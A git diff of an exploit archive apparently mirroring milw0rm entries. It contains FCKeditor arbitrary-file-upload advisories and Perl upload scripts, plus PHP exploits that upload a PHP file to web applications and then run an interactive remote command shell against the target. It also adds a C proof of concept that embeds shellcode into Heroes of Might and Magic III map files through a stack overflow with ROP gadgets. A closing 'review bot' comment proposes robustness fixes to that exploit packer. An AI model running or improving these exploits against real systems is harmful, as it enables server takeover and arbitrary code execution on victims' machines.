-####################
-
-# milw0rm.com [2008-09-09]
+########################################################################
+#
+# S4rK3VT Hacking TEAM
+#
+# Title: KimWebsite (fckeditor) Remote Arbitrary File Upload
+# Vendor: http://sourceforge.net/project/showfiles.php?group_id=196819
+# discover by : Ciph3r
+# We Are : Ciph3r & Rake
+# Ciph3r_blackhat@yahoo.com
+# Impact: Medium
+# Fix: N/A
+# Expl0ters Security TEAM ==>> www.Expl0iters.ir
+########################################################################
+
+####################
+- Vulnerability:
+####################
+
++--> Fckeditor Arbitrary File Upload
+
+The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
+
+[path]/fck/editor/filemanager/upload/php/upload.php script.
+
+
+####################
+- Exploit:
+####################
+
+http://example.com/[path]/fck/editor/filemanager/upload/test.html
+
+####################
+- Solution:
+####################
+
+Restrict and grant only trusted users access to the resources.
+
+####################
+- GreTzZ :
+####################
+
+Iranian Hacker & Kurdish Security TEAM & My Mother
+
+####################
+
+# milw0rm.com [2008-09-09]
diff --git a/platforms/php/webapps/6419.txt b/platforms/php/webapps/6419.txt
index 6a8739034..f7f4bac53 100755
--- a/platforms/php/webapps/6419.txt
+++ b/platforms/php/webapps/6419.txt
@@ -1,42 +1,42 @@
-#!/usr/bin/perl
-use strict;
-use warnings;
-use LWP::UserAgent;
-use HTTP::Request::Common;
-print <);
-
-print "Enter File Path(path to local file to upload): ";
- chomp(my $file=);
-my $ua = LWP::UserAgent->new;
-my $re = $ua->request(POST $url.'/editor/filemanager/upload/php/upload.php',
- Content_Type => 'form-data',
- Content => [ NewFile => $file ] );
-if($re->is_success) {
- if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
- else { print "File Upload Is Disabled! Failed!\n"; }
-} else { print "HTTP Request Failed!\n"; }
-exit;
-
-##############################################################
-##############################################################
-*
-*you can use this and upload files !
-*
-*http://www.site.com/editor/filemanager/upload/test.html
-*
-*http://www.zanfi.nl
-##############################################################
-##############################################################
-
-# milw0rm.com [2008-09-10]
+#!/usr/bin/perl
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+print <);
+
+print "Enter File Path(path to local file to upload): ";
+ chomp(my $file=);
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url.'/editor/filemanager/upload/php/upload.php',
+ Content_Type => 'form-data',
+ Content => [ NewFile => $file ] );
+if($re->is_success) {
+ if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
+ else { print "File Upload Is Disabled! Failed!\n"; }
+} else { print "HTTP Request Failed!\n"; }
+exit;
+
+##############################################################
+##############################################################
+*
+*you can use this and upload files !
+*
+*http://www.site.com/editor/filemanager/upload/test.html
+*
+*http://www.zanfi.nl
+##############################################################
+##############################################################
+
+# milw0rm.com [2008-09-10]
diff --git a/platforms/php/webapps/6448.txt b/platforms/php/webapps/6448.txt
index b2bf9b2c8..234c4793b 100755
--- a/platforms/php/webapps/6448.txt
+++ b/platforms/php/webapps/6448.txt
@@ -1,47 +1,47 @@
-########################################################################
-#
-# S.W.A.T.
-#
-# Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload
-#
-# Vendor: http://webportal.ivanoculmine.com/download.php?mid=14
-#
-# Discover by : S.W.A.T.
-#
-# svvateam@yahoo.com
-#
-# Impact: Medium
-#
-# Fix: Disable It In The Config File ;)
-#
-# Site: wWw.SvvaT.IR
-#
-########################################################################
-
-####################
-- Exploit:
-####################
-
-http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html
-
-####################
-- Demo:
-####################
-
-http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html
-
-####################
-- Solution:
-####################
-
-Restrict and grant only trusted users access to the resources.
-
-####################
-- GreTzZ :
-####################
-
-All My Friend's , Str0ke
-
-####################
-
-# milw0rm.com [2008-09-12]
+########################################################################
+#
+# S.W.A.T.
+#
+# Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload
+#
+# Vendor: http://webportal.ivanoculmine.com/download.php?mid=14
+#
+# Discover by : S.W.A.T.
+#
+# svvateam@yahoo.com
+#
+# Impact: Medium
+#
+# Fix: Disable It In The Config File ;)
+#
+# Site: wWw.SvvaT.IR
+#
+########################################################################
+
+####################
+- Exploit:
+####################
+
+http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html
+
+####################
+- Demo:
+####################
+
+http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html
+
+####################
+- Solution:
+####################
+
+Restrict and grant only trusted users access to the resources.
+
+####################
+- GreTzZ :
+####################
+
+All My Friend's , Str0ke
+
+####################
+
+# milw0rm.com [2008-09-12]
diff --git a/platforms/php/webapps/6573.pl b/platforms/php/webapps/6573.pl
index affbcc4ed..45283fca6 100755
--- a/platforms/php/webapps/6573.pl
+++ b/platforms/php/webapps/6573.pl
@@ -1,28 +1,28 @@
-#!/usr/bin/perl
-use strict;
-use warnings;
-use LWP::UserAgent;
-use HTTP::Request::Common;
-print <);
-
-print "Enter File Path(path to local file to upload): ";
- chomp(my $file=);
-my $ua = LWP::UserAgent->new;
-my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
- Content_Type => 'form-data',
- Content => [ NewFile => $file ] );
-if($re->is_success) {
- if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
- else { print "File Upload Is Disabled! Failed!\n"; }
-} else { print "HTTP Request Failed!\n"; }
-exit;
-
-# milw0rm.com [2008-09-25]
+#!/usr/bin/perl
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+print <);
+
+print "Enter File Path(path to local file to upload): ";
+ chomp(my $file=);
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
+ Content_Type => 'form-data',
+ Content => [ NewFile => $file ] );
+if($re->is_success) {
+ if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
+ else { print "File Upload Is Disabled! Failed!\n"; }
+} else { print "HTTP Request Failed!\n"; }
+exit;
+
+# milw0rm.com [2008-09-25]
diff --git a/platforms/php/webapps/6783.php b/platforms/php/webapps/6783.php
index fc0e9ed76..f38221f51 100755
--- a/platforms/php/webapps/6783.php
+++ b/platforms/php/webapps/6783.php
@@ -1,132 +1,132 @@
-\n";
-$payload .= "--o0oOo0o--\r\n";
-
-$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($payload)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
-$packet .= "Connection: close\r\n\r\n";
-$packet .= $payload;
-
-if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
-else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
-
-$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
-
-$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Cmd: %s\r\n";
-$packet .= "Connection: close\r\n\r\n";
-
-while(1)
-{
- print "\nnukeet-shell# ";
- $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
- {
- $response = http_send($host, sprintf($packet, base64_encode($cmd)));
- preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
- }
- else break;
-}
-
-?>
-
-# milw0rm.com [2008-10-18]
+\n";
+$payload .= "--o0oOo0o--\r\n";
+
+$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $payload;
+
+if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
+else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
+
+$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
+
+$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Cmd: %s\r\n";
+$packet .= "Connection: close\r\n\r\n";
+
+while(1)
+{
+ print "\nnukeet-shell# ";
+ $cmd = trim(fgets(STDIN));
+ if ($cmd != "exit")
+ {
+ $response = http_send($host, sprintf($packet, base64_encode($cmd)));
+ preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
+ }
+ else break;
+}
+
+?>
+
+# milw0rm.com [2008-10-18]
diff --git a/platforms/php/webapps/7158.txt b/platforms/php/webapps/7158.txt
index 7303d2770..23cc6fd42 100755
--- a/platforms/php/webapps/7158.txt
+++ b/platforms/php/webapps/7158.txt
@@ -1,51 +1,51 @@
-########################################################################
-#
-# Yellow Flood Organization
-#
-# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
-#
-# Source: http://www.alexscriptengine.de/blog/category/article-engine/
-#
-# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
-#
-# Discover by: Batter
-#
-########################################################################
-
-
-
-####################
-- Vulnerability:
-####################
-
-/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
-
-Command=FileUpload&Type=File&CurrentFolder=/
-
-####################
-- Exploit:
-####################
-
-http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
-
-####################
-- how To use:
-####################
-
-http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
-
-####################
-- Solution:
-####################
-
-Restrict and grant only trusted users access to the resources.
-
-####################
-- Greets :
-####################
-
-THE.HACKER.ONE , Str0ke
-
-####################
-
-# milw0rm.com [2008-11-19]
+########################################################################
+#
+# Yellow Flood Organization
+#
+# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
+#
+# Source: http://www.alexscriptengine.de/blog/category/article-engine/
+#
+# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
+#
+# Discover by: Batter
+#
+########################################################################
+
+
+
+####################
+- Vulnerability:
+####################
+
+/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
+
+Command=FileUpload&Type=File&CurrentFolder=/
+
+####################
+- Exploit:
+####################
+
+http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
+
+####################
+- how To use:
+####################
+
+http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
+
+####################
+- Solution:
+####################
+
+Restrict and grant only trusted users access to the resources.
+
+####################
+- Greets :
+####################
+
+THE.HACKER.ONE , Str0ke
+
+####################
+
+# milw0rm.com [2008-11-19]
diff --git a/platforms/php/webapps/8060.php b/platforms/php/webapps/8060.php
index d15407cb1..da245c619 100755
--- a/platforms/php/webapps/8060.php
+++ b/platforms/php/webapps/8060.php
@@ -1,95 +1,95 @@
-################################################################
-#
-# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
-#
-# Bug Discovered By : Sp3shial
-#
-# Sp3shial@ymail.com
-#
-# Persian Boys Hacking Team From A Land With A History-Long Background
-#
-# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0
-#
-###############################################################
-
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-
-define(STDIN, fopen("php://stdin", "r"));
-
-function http_send($host, $packet)
-{
- $sock = fsockopen($host, 80);
- while (!$sock)
- {
- print "\n[-] No response from {$host}:80 Trying again...";
- $sock = fsockopen($host, 80);
- }
- fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
- return $resp;
-}
-
-function connector_response($html)
-{
- return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
-}
-
-print "\n+------------------------------------------------------------------+";
-print "\n| Falt4 CMS (fckeditor) Arbitrary File Upload Exploit by Sp3shial |";
-print "\n+------------------------------------------------------------------+\n";
-
-if ($argc < 3)
-{
- print "\nUsage......: php $argv[0] host path";
- print "\nExample....: php $argv[0] localhost /";
- print "\nExample....: php $argv[0] localhost /Falt4/\n";
- die();
-}
-
-$host = $argv[1];
-$path = ereg_replace("(/){2,}", "/", $argv[2]);
-
-$filename = md5(time()).".php";
-$connector = "modules/newsletter/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
-
-$payload = "--o0oOo0o\r\n";
-$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
-$payload .= "Content-Type: application/zip\r\n\r\n";
-$payload .= "PK\003\004\n";
-$payload .= "--o0oOo0o--\r\n";
-
-$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($payload)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
-$packet .= "Connection: close\r\n\r\n";
-$packet .= $payload;
-
-if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
-else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
-
-$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
-
-$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Cmd: %s\r\n";
-$packet .= "Connection: close\r\n\r\n";
-
-while(1)
-{
- print "\nFalt4-shell# ";
- $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
- {
- $response = http_send($host, sprintf($packet, base64_encode($cmd)));
- preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
- }
- else break;
-}
-
-?>
-
-# milw0rm.com [2009-02-16]
+################################################################
+#
+# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
+#
+# Bug Discovered By : Sp3shial
+#
+# Sp3shial@ymail.com
+#
+# Persian Boys Hacking Team From A Land With A History-Long Background
+#
+# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0
+#
+###############################################################
+
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+
+define(STDIN, fopen("php://stdin", "r"));
+
+function http_send($host, $packet)
+{
+ $sock = fsockopen($host, 80);
+ while (!$sock)
+ {
+ print "\n[-] No response from {$host}:80 Trying again...";
+ $sock = fsockopen($host, 80);
+ }
+ fputs($sock, $packet);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
+ fclose($sock);
+ return $resp;
+}
+
+function connector_response($html)
+{
+ return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
+}
+
+print "\n+------------------------------------------------------------------+";
+print "\n| Falt4 CMS (fckeditor) Arbitrary File Upload Exploit by Sp3shial |";
+print "\n+------------------------------------------------------------------+\n";
+
+if ($argc < 3)
+{
+ print "\nUsage......: php $argv[0] host path";
+ print "\nExample....: php $argv[0] localhost /";
+ print "\nExample....: php $argv[0] localhost /Falt4/\n";
+ die();
+}
+
+$host = $argv[1];
+$path = ereg_replace("(/){2,}", "/", $argv[2]);
+
+$filename = md5(time()).".php";
+$connector = "modules/newsletter/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
+
+$payload = "--o0oOo0o\r\n";
+$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
+$payload .= "Content-Type: application/zip\r\n\r\n";
+$payload .= "PK\003\004\n";
+$payload .= "--o0oOo0o--\r\n";
+
+$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $payload;
+
+if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
+else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
+
+$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
+
+$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Cmd: %s\r\n";
+$packet .= "Connection: close\r\n\r\n";
+
+while(1)
+{
+ print "\nFalt4-shell# ";
+ $cmd = trim(fgets(STDIN));
+ if ($cmd != "exit")
+ {
+ $response = http_send($host, sprintf($packet, base64_encode($cmd)));
+ preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
+ }
+ else break;
+}
+
+?>
+
+# milw0rm.com [2009-02-16]
diff --git a/platforms/win64/local/37064.py b/platforms/win64/local/37064.py
index a3dbbb29c..c63f52069 100755
--- a/platforms/win64/local/37064.py
+++ b/platforms/win64/local/37064.py
@@ -6,6 +6,8 @@ # Target OS Windows 8.0 - 8.1 x64 # Author: Matteo Memelli ryujin offensive-security.com +# EDB Note: Swapping the shellcode for a bind or reverse shell will BSOD the machine. + from ctypes import * from ctypes.wintypes import * import struct, sys, os, time, threading, signal
diff --git a/platforms/windows/local/37716.c b/platforms/windows/local/37716.c
new file mode 100755
index 000000000..2a57f5712
--- /dev/null
+++ b/platforms/windows/local/37716.c
@@ -0,0 +1,272 @@
+/*
+# Exploit Title : Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution
+# Date : 2015-07-29
+# Exploit Author : John AAkerblom, Pierre Lindblad
+# Website: http://h3minternals.net
+# Vendor Homepage : 3do.com (defunct), https://sites.google.com/site/heroes3hd/
+# Version : 4.0.0.0 AND HoMM 3 HD 3.808 build 9
+# Tested on : Windows XP, Windows 8.1
+# Category: exploits
+
+# Description:
+ This PoC embeds an exploit into an uncompressed map file (.h3m) for Heroes
+ of Might and Magic III. Once the map is started in-game, a buffer overflow
+ occuring when loading object sprite names leads to shellcode execution.
+
+ Only basic arbitrary code execution is covered in this PoC but is possible to
+ craft an exploit that lets the game continue normally after the shellcode has
+ been executed. Using extensive knowledge of the .h3m format, it is even
+ possible to create a map file that loads like normal in the game's map editor
+ (which lacks the vulnerability) but stealthily executes shellcode when opened
+ in-game.
+*/
+#include
+#include
+#include
+#include
+
+/* Calc payload: https://code.google.com/p/win-exec-calc-shellcode/
+ 0xEBFE added at end. Note that a NULL-less payload is not actually needed
+
+Copyright (c) 2009-2014 Berend-Jan "SkyLined" Wever
+and Peter Ferrie
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+ * Redistributions of source code must retain the above copyright
+ notice, this list of conditions and the following disclaimer.
+ * Redistributions in binary form must reproduce the above copyright
+ notice, this list of conditions and the following disclaimer in the
+ documentation and/or other materials provided with the distribution.
+ * Neither the name of the copyright holder nor the names of the
+ contributors may be used to endorse or promote products derived from
+ this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
+INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
+AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */
+static const uint8_t CALC_PAYLOAD[] = {
+ 0x31, 0xD2, 0x52, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x52,
+ 0x51, 0x64, 0x8B, 0x72, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x0C,
+ 0xAD, 0x8B, 0x30, 0x8B, 0x7E, 0x18, 0x8B, 0x5F, 0x3C, 0x8B, 0x5C,
+ 0x1F, 0x78, 0x8B, 0x74, 0x1F, 0x20, 0x01, 0xFE, 0x8B, 0x54, 0x1F,
+ 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x42, 0x42, 0xAD, 0x81, 0x3C, 0x07,
+ 0x57, 0x69, 0x6E, 0x45, 0x75, 0xF0, 0x8B, 0x74, 0x1F, 0x1C, 0x01,
+ 0xFE, 0x03, 0x3C, 0xAE, 0xFF, 0xD7, 0xEB, 0xFE
+};
+
+/*
+* The memmem() function finds the start of the first occurrence of the
+* substring 'needle' of length 'nlen' in the memory area 'haystack' of
+* length 'hlen'.
+*
+* The return value is a pointer to the beginning of the sub-string, or
+* NULL if the substring is not found.
+*
+* Original author: caf, http://stackoverflow.com/a/2188951
+*/
+static uint8_t *_memmem(uint8_t *haystack, size_t hlen, uint8_t *needle, size_t nlen)
+{
+ uint8_t needle_first;
+ uint8_t *p = haystack;
+ size_t plen = hlen;
+
+ if (!nlen)
+ return NULL;
+
+ needle_first = *(uint8_t *)needle;
+
+ while (plen >= nlen && (p = memchr(p, needle_first, plen - nlen + 1)))
+ {
+ if (!memcmp(p, needle, nlen))
+ return p;
+
+ p++;
+ plen = hlen - (p - haystack);
+ }
+
+ return NULL;
+}
+
+#ifdef _MSC_VER
+ #pragma warning(disable:4996) // M$ fopen so unsafe
+#endif
+
+#pragma pack(push, 1)
+// exploit struct
+// .h3m files contain an array of object attributes - OA - in which each
+// entry starts with a string length and then a string for an object sprite.
+// This exploit overflows the stack with a malicious sprite name.
+struct exploit_oa_t
+{
+ uint32_t size; // size of the rest of this struct, including shellcode
+
+ // The rest of the struct is the sprite name for the OA, bytes of
+ // which an CALL ESP-gadget address is placed so that it overwrites the
+ // return address, when ESP is called shellcode2 will be executed. An
+ // additional 2 "anticrash" gadgets are needed so the game does not crash
+ // before returning to the CALL ESP-gadget.
+
+ uint8_t nullbyte; // Must be 0x00, terminating sprite name
+ uint8_t overwritten[6]; // Overwritten by game
+ uint8_t shellcode1[121]; // Mostly not used, some is overwritten
+ uint32_t call_esp_gadget; // Address of CALL [ESP], for saved eip on stack
+
+ // anticrash_gadget1, needs to pass the following code down to final JMP:
+ //
+ // MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4]
+ // XOR EBX, EBX
+ // CMP EAX, EBX
+ // JE SHORT ; JMP to crash if EAX is 0
+ // MOV CL, BYTE PTR DS : [EAX - 1]
+ // CMP CL, BL
+ // JE SHORT ; JMP to crash if the byte before [EAX] is 0
+ // CMP CL, 0FF
+ // JE SHORT ; JMP to crash if the byte before [EAX] is 0xFF
+ // CPU Disasm
+ // CMP EDI, EBX
+ // JNE ; JMP to good spot. Always occurs if we get this far
+ uint32_t anticrash_gadget1;
+
+ // anticrash_gadget2, needs to return out of the following call (tricky):
+ //
+ // MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2]
+ // CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4]
+ uint32_t anticrash_gadget2;
+
+ // Here at 144 bytes into this struct comes the shellcode that will be
+ // executed. For the game to survive, it is wise to use this only for a
+ // short jmp as doing so means only 2 values have to be restored on the
+ // stack. Namely: original return address and format value of the h3m.
+ // This PoC simply puts shellcode here, meaning the game cannot continue
+ // after shellcode execution.
+ uint8_t shellcode2[];
+};
+
+struct offsets_t
+{
+ uint32_t call_esp_gadget;
+ uint32_t anticrash_gadget1;
+ uint32_t anticrash_gadget2;
+};
+#pragma pack(pop)
+
+static const struct offsets_t * const TARGET_OFFSETS[] = {
+ (struct offsets_t *)"\x87\xFF\x4E\x00\xD4\x97\x44\x00\x30\x64\x6A\x00",
+ (struct offsets_t *)"\x0F\x0C\x58\x00\x48\x6A\x45\x00\x30\x68\x6A\x00"
+};
+#define TARGET_DESCS " 1: H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]\n" \
+ " 2: HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]"
+#define MAX_TARGET 2
+
+// Name of a sprite present in all maps, this is overwritten with exploit
+#define NEEDLE "AVWmrnd0.def"
+
+int pack_h3m(FILE *h3m_f, const struct offsets_t * const ofs, const uint8_t *payload, long payload_size)
+{
+ uint8_t *buf = NULL;
+ uint8_t *p = NULL;
+ long h3m_size = 0;
+ long bytes = 0;
+ struct exploit_oa_t *exp = NULL;
+
+ // Read entire h3m file into memory
+ fseek(h3m_f, 0, SEEK_END);
+ h3m_size = ftell(h3m_f);
+ rewind(h3m_f);
+ buf = malloc(h3m_size);
+ if (buf == NULL) {
+ puts("[!] Failed to allocate memory");
+ return 1;
+ }
+ bytes = fread(buf, sizeof(uint8_t), h3m_size, h3m_f);
+ if (bytes != h3m_size) {
+ free(buf);
+ puts("[!] Failed to read all bytes");
+ return 1;
+ }
+
+ // Find game object array in .h3m, where we will overwrite the first entry
+ p = _memmem(buf, h3m_size, (uint8_t *)NEEDLE, sizeof(NEEDLE) - 1);
+ if (p == NULL) {
+ puts("[!] Failed to find needle \"" NEEDLE "\" in file. Make sure it is an uncompressed .h3m");
+ free(buf);
+ return 1;
+ }
+
+ // Move back 4 bytes from sprite name, pointing to the size of the sprite name
+ p -= 4;
+
+ // Overwrite the first game object with exploit
+ exp = (struct exploit_oa_t *)p;
+ exp->size = sizeof(*exp) - sizeof(exp->size) + payload_size;
+ exp->nullbyte = 0;
+ exp->call_esp_gadget = ofs->call_esp_gadget;
+ exp->anticrash_gadget1 = ofs->anticrash_gadget1;
+ exp->anticrash_gadget2 = ofs->anticrash_gadget2;
+ memcpy(exp->shellcode2, payload, payload_size);
+
+ // Write entire file from memory and cleanup
+ rewind(h3m_f);
+ bytes = fwrite(buf, sizeof(uint8_t), h3m_size, h3m_f);
+ if (bytes != h3m_size) {
+ free(buf);
+ puts("[!] Failed to write all bytes");
+ return 1;
+ }
+ free(buf);
+
+ return 0;
+}
+
+static void _print_usage(void)
+{
+ puts("Usage: h3mpacker ");
+ puts("Available targets:");
+ puts(TARGET_DESCS);
+ puts("Examples:");
+ puts(" h3mpacker Arrogance.h3m 1");
+ puts(" h3mpacker Deluge.h3m 2");
+}
+
+int main(int argc, char **argv)
+{
+ FILE *h3m_f = NULL;
+ int ret = 0;
+ int target;
+
+ if (argc != 3) {
+ _print_usage();
+ return 1;
+ }
+
+ h3m_f = fopen(argv[1], "rb+");
+ target = strtoul(argv[2], NULL, 0);
+
+ if (h3m_f == NULL || target < 1 || target > MAX_TARGET) {
+ if (h3m_f != NULL)
+ fclose(h3m_f);
+ _print_usage();
+ return 1;
+ }
+
+ ret = pack_h3m(h3m_f, TARGET_OFFSETS[target-1], CALC_PAYLOAD, sizeof(CALC_PAYLOAD));
+
+ fclose(h3m_f);
+
+ if (ret != 0)
+ return ret;
+
+ printf("[+] Payload embedded into h3m file %s\n", argv[1]);
+
+ return 0;
+}
+
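Review bot: pack_h3m writes sizeof(*exp) + payload_size bytes at p without checking that they fit inside buf: `p -= 4;` steps before the start of buf when the needle is found at an offset below 4, and the field stores plus `memcpy(exp->shellcode2, payload, payload_size);` run past buf + h3m_size when the needle sits within roughly 144 + payload_size bytes of the end of a small or truncated input file, corrupting the packer's own heap instead of reporting an error. A bounds check before the back-step and before the overwrite would route such inputs through the same clean error path the needle-not-found case already uses. Separately, `h3m_size = ftell(h3m_f);` is unchecked, so a -1 from ftell reaches `malloc(h3m_size)` as a huge size and is reported as a misleading allocation failure; a `if (h3m_size < 0)` guard with its own message would make that diagnosable. main's `target = strtoul(argv[2], NULL, 0);` also accepts trailing junk ("1abc") silently, which strtol with an end pointer compared against '\0' would reject.
```c
    // Move back 4 bytes from sprite name, pointing to the size of the sprite name
    if (p - buf < 4) {
        puts("[!] Needle found too close to start of file");
        free(buf);
        return 1;
    }
    p -= 4;
    if ((size_t)((buf + h3m_size) - p) < sizeof(*exp) + (size_t)payload_size) {
        puts("[!] Not enough room after needle to embed payload");
        free(buf);
        return 1;
    }
    // … unchanged: overwrite of the first game object and write-back of the file …
```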